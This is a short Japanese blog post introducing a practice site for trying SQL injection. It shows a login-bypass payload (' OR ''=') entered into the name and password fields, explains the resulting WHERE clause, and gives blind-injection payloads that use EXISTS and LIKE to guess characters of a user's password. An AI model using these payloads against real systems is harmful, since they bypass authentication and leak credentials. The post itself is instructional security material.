Architect's Log

I'm a Cloud Architect. I'm highly motivated to reduce toils with driving DevOps.

SQLインジェクションを試せるサイト「SQL Injection Attack」

SQLインジェクションを試せるサイト「SQL Injection Attack」を紹介します。
SQL Injection Attack

試してみます


以下を入力します。

name
' OR ''='
password
' OR ''='



[送信]をクリックします。



ログインできてしまいました。

どうして?

WHERE句が以下になるからですね。

WHERE name='' OR ''='' AND password='' OR ''=''

他にも

jakeのパスワードに"w"が含まれることを確認する
name
jake
password
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
jakeのパスワードの3文字目が"w"であることを確認する
name
jake
password
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='